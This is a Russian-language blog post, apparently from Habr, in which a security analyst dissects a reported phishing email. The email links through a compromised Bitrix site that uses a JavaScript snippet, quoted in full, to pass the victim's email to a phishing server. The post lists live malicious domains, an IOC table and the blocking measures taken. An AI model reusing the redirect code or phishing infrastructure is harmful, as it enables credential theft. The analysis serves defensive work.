Всем привет! Хочу поделиться, возможно, не новым, но, на мой взгляд, довольно изощренным видом фишинга. Кто-то уже наверняка сталкивался с таким методом, а для кого-то он окажется в новинку.
ПРЕДУПРЕЖДЕНИЕ: Материалы данной статьи носят исключительно ознакомительный характер и публикуются в образовательных целях. Фишинг, равно как и любые разновидности социальной инженерии, направленные на получение НСД или нарушение целостности, доступности и конфиденциальности информации, являются уголовно наказуемыми деяниями. Информация предназначена для специалистов Blue Team в интересах противодействия интернет-мошенничеству.
Письмо
Открываю рабочую почту и вижу обратную связь от пользователя, в которой он предупреждает о попытке скама.
Обычная рядовая ситуация: юзера пытаются соскамить на письмо из техподдержки, но он сразу раскусил обман и перенаправил письмо в Отдел ИБ.
Вложение
Открываю сохраненное письмо. Вижу классическую попытку обмана, рассчитанную на невнимательность — сброс пароля от учетной записи. Письмо отправлено с домена «etrh.ru» (зарегистрирован в РУ-сегменте, но об этом далее).
Казалось бы, обычный немного топорный скам, с которым сталкиваешься ежедневно. Видно, что мошенники особо не готовились, скорее всего запустили в массы с помощью скрипта-рассыльщика.
Навожу курсор на гиперссылку и вижу адрес: https://zil-dom[.]ru/bitrix/admin/rrc/cvvc[.]html
Изучение ссылки
Проверяю ссылку с помощью curl, чтобы найти артефакты (стандартная процедура в таких ситуациях). И что же мы видим?
curl -s https://zil-dom.ru/bitrix/admin/rrc/cvvc.html
А видим мы ловкий трюк с использованием Java-скрипта, который автоматически редиректит нас на совершенно другой веб-ресурс.
https://threestarcrm.com/7yy/index.php?userid={victim_email}
Механизм атаки выглядит следующим образом: код на странице cvvc.html извлекает email жертвы из хэша URL и мгновенно (через 1 мс) перенаправляет браузер на основной фишинговый сервер:
var hash = window.location.hash;var em = hash.split('#')[1];window.setTimeout(function() { window.location.href = 'https://threestarcrm.com/7yy/index.php?userid=' + em;}, 1);
ANY.RUN — REPORT
Прогоняю фишинговую ссылку через песочницу и получаю вполне очевидный результат — malicious activity
Индикаторы компрометации (IOC)
В таблице ниже — обнаруженные в ходе короткого расследования индикаторы. Считаю своим долгом предупредить коллег из Blue Team.
|
Тип |
Значение |
Описание |
|---|---|---|
|
Домен |
Скомпрометированный сайт-редиректор |
|
|
Домен |
Фишинговый сайт (основной) |
|
|
IP |
|
Актуальный IP фишингового сервера |
|
IP-сеть |
|
Сеть хостинг-провайдера (рекомендована к блокировке) |
|
URL |
Путь к вредоносному файлу |
|
|
URL |
|
Путь к фишинговой форме |
|
|
Целевой email в тестовом образце |
|
|
WHOIS |
Creation Date: 02.04.2019 |
Домену 7+ лет (не «однодневка») |
|
Регистратор |
PDR Ltd. (PublicDomainRegistry.com) |
Индийский регистратор |
Принятые меры
-
На NGFW и антивирусе добавлены в черный список:
-
FQDN-объект:
threestarcrm.com— блокировка по доменному имени -
Subnet-объект:
Fishing_69.49.232.0/22— блокировка всей подсети хостинг-провайдера (69.49.232.0–69.49.235.255) -
FQDN-объект:
zil-dom.ru— блокировка скомпрометированного редиректора2. Направлено обращение хостерам с приложением пруфов. Обратной связи пока не получил (что немного огорчает)
Резюме (коротко)
Вряд ли я открыл какую-то тайну. Домены «zil-dom.ru» и «etrh.ru», вероятно, скомпрометированы. Оба зарегистрированы на PRIVATE PERSON. Домен «treestarcrm.com» живет в Интернете около 7 лет, но блокировать его, по-видимому, никто не спешит. Методика фишинга достаточно хитрая, потому что все браузеры по умолчанию выполняют Java-срипты.
Основная опасность — это подмена содержания гиперссылки. При грамотной разведке цели мошенники могли бы вставить туда любой легитимный адрес компании и без труда обманули бы жертву, которая попыталась бы проверить ссылку, наведя на нее курсор (о чем обычно просят всех юзеров, перед тем, как кликнуть по ней). Такие вот дела.
Надеюсь, что статья была полезна. Всем добра! 🙂
ссылка на оригинал статьи https://habr.com/ru/articles/1035814/